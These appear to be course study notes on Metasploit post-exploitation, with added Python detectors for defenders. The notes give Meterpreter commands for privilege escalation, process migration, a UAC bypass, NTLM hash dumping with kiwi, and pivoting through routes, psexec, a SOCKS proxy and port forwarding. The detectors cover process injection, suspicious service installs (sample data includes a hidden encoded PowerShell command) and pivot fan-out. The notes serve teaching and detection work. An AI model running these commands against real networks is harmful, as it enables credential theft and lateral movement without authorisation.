Performing Post-Exploitation with Metasploit
21.3.1 - Core meterpreter post-exploitation with metasploit
Display the time for which the user has been idle. After obtaining basic information about the current user and operating system, this should be one of our first commands, as it indicates whether the target machine is currently in use.
idletime
We can use getsystem in the meterpreter shell to attempt privilege escalation to NT AUTHORITY\SYSTEM. This requires the initial user to hold SeImpersonatePrivilege.
getsystem
Another important post-exploitation feature is migrate. When we compromise a host, our Meterpreter payload runs inside the process of the application we attacked or the one that executed our payload. If the victim closes that process, our access to the machine is closed as well. In addition, depending on how the Windows binary containing the Meterpreter payload is named, the process name may look suspicious to a defender searching through the process list. We can use migrate to move the execution of our Meterpreter payload into a different process.
ps
migrate 8052
ps
Migrate to a newly spawned process with no window, created with execute -H. This is useful if there are not many existing processes to migrate to.
execute -H -f notepad
migrate 2720
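From a defender's side, migrate is process injection: Meterpreter creates a thread in the chosen process and continues running there, so the original process can exit without the session being lost. Sysmon records exactly that as Event ID 8 (CreateRemoteThread), with the source and target image, both PIDs and the module backing the new thread's start address. The script below is an added example written for these notes, not code from the course or from Metasploit. It parses constructed Sysmon-style JSON lines (sample data, not real logs; the paths, PIDs and the allowlist are assumptions to be tuned per environment) and flags remote threads created by an untrusted source, threads whose start address has no backing module, and a source that injects into several processes in a row.

```python
import json
from collections import Counter

# Constructed Sysmon records (Event ID 8 = CreateRemoteThread, Event ID 1 = process
# create), reduced to the fields this example needs. Illustrative, not captured logs.
SAMPLE_LOG = r"""
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "SourceProcessId": 612, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 3400, "StartModule": "C:\\Windows\\System32\\ntdll.dll", "StartFunction": "LdrInitializeThunk"}
{"EventID": 8, "SourceImage": "C:\\Users\\luiza\\Downloads\\update.exe", "SourceProcessId": 5128, "TargetImage": "C:\\Windows\\System32\\notepad.exe", "TargetProcessId": 2720, "StartModule": "", "StartFunction": ""}
{"EventID": 8, "SourceImage": "C:\\Users\\luiza\\Downloads\\update.exe", "SourceProcessId": 5128, "TargetImage": "C:\\Windows\\System32\\spoolsv.exe", "TargetProcessId": 1440, "StartModule": "", "StartFunction": ""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "ProcessId": 2720}
"""

# Assumed allowlist of system binaries that legitimately create threads in other
# processes. A real deployment derives this from its own Sysmon baseline.
TRUSTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_events(text):
    """Parse JSON-lines log text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def score_event(ev):
    """Return the reasons an Event ID 8 record looks like process injection (empty if none)."""
    if ev.get("EventID") != 8:
        return []
    reasons = []
    src = ev["SourceImage"].lower()
    if src not in TRUSTED_SOURCES:
        reasons.append("untrusted source image")
    # Injected shellcode runs from memory that no loaded module backs, so Sysmon
    # cannot resolve a StartModule for the thread.
    if not ev.get("StartModule"):
        reasons.append("thread start address not backed by a module")
    if src.startswith(USER_WRITABLE):
        reasons.append("source runs from a user-writable path")
    return reasons


def find_injection(events):
    """Collect one alert per suspicious CreateRemoteThread event."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            alerts.append({
                "source_pid": ev["SourceProcessId"],
                "source": ev["SourceImage"],
                "target_pid": ev["TargetProcessId"],
                "target": ev["TargetImage"],
                "reasons": reasons,
            })
    return alerts


def sources_with_multiple_targets(alerts, threshold=2):
    """PIDs that injected into at least `threshold` processes: a stronger signal than one hit."""
    counts = Counter(a["source_pid"] for a in alerts)
    return {pid for pid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = find_injection(parse_events(SAMPLE_LOG))
    for h in hits:
        print(f"PID {h['source_pid']} -> {h['target']} (PID {h['target_pid']}): {', '.join(h['reasons'])}")
    print("repeat injectors:", sources_with_multiple_targets(hits))
```

Event ID 8 is only written when the Sysmon configuration contains a CreateRemoteThread rule, so confirm the configuration before relying on this detection; an "execute -H" followed by an immediate migrate into the new process also leaves an Event ID 1 for the hidden process next to the Event ID 8, which is worth correlating.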
21.3.2 - Post-exploitation modules
Review the integrity level of the current process (the one we migrated to) with PowerShell. It shows Medium on the example machine.
shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Background the current session (bg), then search for a UAC bypass post-exploitation module to run against it.
We use this one on the example machine. It raises the token integrity level from medium to high.
use exploit/windows/local/bypassuac_sdclt
Get-NtTokenIntegrityLevel
Extensions can also be loaded directly inside an active session. An example of this is the kiwi extension, which provides the capabilities of Mimikatz.
load kiwi
Retrieve NTLM hashes
creds_msv
21.3.3 - Pivoting with metasploit
Start by checking for a second network interface from a shell.
ipconfig
Then background the session and add a route to the internal network through it (session 12 here).
bg
route add 172.16.5.0/24 12
route print
Scan the newly found machine through the route.
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.5.200
set PORTS 445,3389
run
It's important to note that the added route only works for connections we initiate through the session. Because of this, the payload on the new target must be a bind shell, so that the route can be used to connect to it. An example of this is the psexec module (the options you need to set are omitted here).
use exploit/windows/smb/psexec
run
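On the target, psexec authenticates to the ADMIN$ share (the Windows directory) and installs a service whose image is either an uploaded binary or a command line; the Windows System log records that as Event ID 7045 ("A service was installed in the system") with the service name, image path, service type, start type and account. Unless the operator sets them, Metasploit's psexec module randomises the service name and file name. The script below is an added example, not part of these notes or of the framework: it scores constructed 7045 records (sample data; the known-good entries, weights, thresholds and path rules are assumptions for illustration) on a random-looking name, an image dropped in the Windows root or a user-writable directory, and an encoded PowerShell command line used as the service image.

```python
import re

# Constructed Event ID 7045 records (System log). Illustrative, not captured logs.
# The encoded command in the third record is a truncated placeholder.
SAMPLE_7045 = [
    {"ServiceName": "MpsSvc", "ImagePath": r"C:\Windows\system32\svchost.exe -k NetworkService -p",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": r"NT AUTHORITY\LocalService"},
    {"ServiceName": "KjdqXpWz", "ImagePath": r"%SYSTEMROOT%\WpRtzsXa.exe",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "hRtqPlmz",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgAIAAo...",
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Sense", "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "ServiceType": "user mode service", "StartType": "demand start", "AccountName": "LocalSystem"},
]

VOWELS = set("aeiou")
# Assumed: directories where a legitimate service binary should not live.
SUSPICIOUS_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
ENCODED_CMD = re.compile(r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\s", re.IGNORECASE)


def looks_random(name):
    """Heuristic: generated names tend to have long consonant runs or almost no vowels."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(letters) < 6:
        return False
    longest = run = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    return longest >= 4 or vowel_ratio < 0.2


def image_binary(image_path):
    """Extract the executable from an ImagePath, honouring a quoted path with spaces."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    return p.split(" ", 1)[0]


def expand(path):
    """Lower-case the path and expand the environment variables seen in service images."""
    p = path.lower()
    for var in ("%systemroot%", "%windir%"):
        p = p.replace(var, "c:\\windows")
    return p.replace("%comspec%", "c:\\windows\\system32\\cmd.exe")


def score_service(ev):
    """Return (reason, weight) pairs for one 7045 record."""
    reasons = []
    if looks_random(ev["ServiceName"]):
        reasons.append(("random-looking service name", 1))
    binary = expand(image_binary(ev["ImagePath"]))
    directory = binary.rsplit("\\", 1)[0] if "\\" in binary else ""
    # ADMIN$ maps to the Windows root, so an uploaded service binary lands there.
    if directory == "c:\\windows" or binary.startswith(SUSPICIOUS_DIRS):
        reasons.append(("binary in Windows root or user-writable path", 2))
    if ENCODED_CMD.search(ev["ImagePath"]):
        reasons.append(("encoded PowerShell command as service image", 2))
    return reasons


def find_suspicious_services(events, threshold=3):
    """Alert on records whose summed weights reach the threshold."""
    alerts = []
    for ev in events:
        reasons = score_service(ev)
        total = sum(w for _, w in reasons)
        if total >= threshold:
            alerts.append({"service": ev["ServiceName"], "score": total,
                           "reasons": [r for r, _ in reasons]})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_services(SAMPLE_7045):
        print(f"{a['service']} (score {a['score']}): {', '.join(a['reasons'])}")
```

The name heuristic alone is deliberately weak (MpsSvc scores a point too), which is why it only tips an alert together with an odd image path or command line; in practice the 7045 event is also correlated with the preceding network logon (Security Event ID 4624, logon type 3) from the pivot host.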
As an alternative to adding routes manually, we can use the autoroute post-exploitation module to set up pivot routes through an existing Meterpreter session automatically.
use multi/manage/autoroute
sessions -l
set session 12
We could now use the psexec module as we did before, but we can also combine routes with the server/socks_proxy auxiliary module to configure a SOCKS5 proxy. This allows applications outside of the Metasploit Framework to tunnel through the pivot, on port 1080 by default.
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set VERSION 5
run -j
Finally, we can run xfreerdp through proxychains to reach the GUI over the proxy.
sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza
We can achieve a similar result with port forwarding from inside the Meterpreter session. Here we use local port forwarding.
portfwd -h
portfwd add -l 3389 -p 3389 -r 172.16.5.200
sudo xfreerdp /v:127.0.0.1 /u:luiza
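Everything in this pivoting section, whether the portscan module, psexec, the SOCKS proxy or portfwd, turns the compromised dual-homed host into the source of SMB and RDP connections into 172.16.5.0/24 that it never made before, because the traffic is emitted from the pivot's own interface. The script below is an added example, not from these notes or from Metasploit; it runs over constructed flow records (timestamp, source, destination, destination port; the addresses, window and thresholds are assumptions) and raises an alert when one source reaches several internal hosts on administrative ports within a short window, none of which it had contacted during the baseline period.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records: timestamp, source, destination, destination port.
# 10.10.1.50 is the assumed dual-homed pivot; 172.16.5.10 is a server it
# legitimately talks to. Not real traffic.
SAMPLE_FLOWS = """\
2024-03-01T09:00:01 10.10.1.50 172.16.5.10 445
2024-03-01T09:00:05 10.10.1.50 172.16.5.10 445
2024-03-01T10:00:00 10.10.1.50 172.16.5.200 445
2024-03-01T10:00:01 10.10.1.50 172.16.5.200 3389
2024-03-01T10:00:02 10.10.1.50 172.16.5.201 445
2024-03-01T10:00:03 10.10.1.50 172.16.5.202 445
2024-03-01T10:00:04 10.10.1.50 172.16.5.203 3389
2024-03-01T10:30:00 10.10.1.77 172.16.5.10 445
"""

INTERNAL_NET = ipaddress.ip_network("172.16.5.0/24")  # assumed protected subnet
ADMIN_PORTS = {445, 3389}                              # SMB and RDP, as scanned above


def parse_flows(text):
    """Parse whitespace-separated flow lines into (datetime, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return flows


def baseline_pairs(flows, until):
    """(src, dst) pairs observed before `until`; these are treated as known-good."""
    return {(s, d) for t, s, d, _ in flows if t < until}


def detect_pivot_fanout(flows, baseline, window=timedelta(minutes=5), min_new_hosts=3):
    """Map each source to the new internal hosts it reached on admin ports inside one window."""
    per_src = defaultdict(list)
    for t, s, d, p in flows:
        if p in ADMIN_PORTS and ipaddress.ip_address(d) in INTERNAL_NET and (s, d) not in baseline:
            per_src[s].append((t, d))
    alerts = {}
    for s, hits in per_src.items():
        hits.sort()
        # Slide the window over each hit's start time and count distinct new hosts.
        for t0, _ in hits:
            hosts = {d for t, d in hits if t0 <= t < t0 + window}
            if len(hosts) >= min_new_hosts:
                alerts[s] = sorted(hosts)
                break
    return alerts


def run_example():
    """Build the baseline from the morning traffic and evaluate the rest of the day."""
    flows = parse_flows(SAMPLE_FLOWS)
    baseline = baseline_pairs(flows, datetime(2024, 3, 1, 9, 30))
    return detect_pivot_fanout(flows, baseline)


if __name__ == "__main__":
    for src, hosts in run_example().items():
        print(f"{src} reached {len(hosts)} new internal hosts on admin ports: {hosts}")
```

The single new connection from 10.10.1.77 is below the threshold and stays silent, which is the trade-off of this detection: a pivot used for one careful psexec or RDP session to a single host looks like ordinary administration at the network layer, and the host-side signals (new service installation, remote thread creation) are what catch that case.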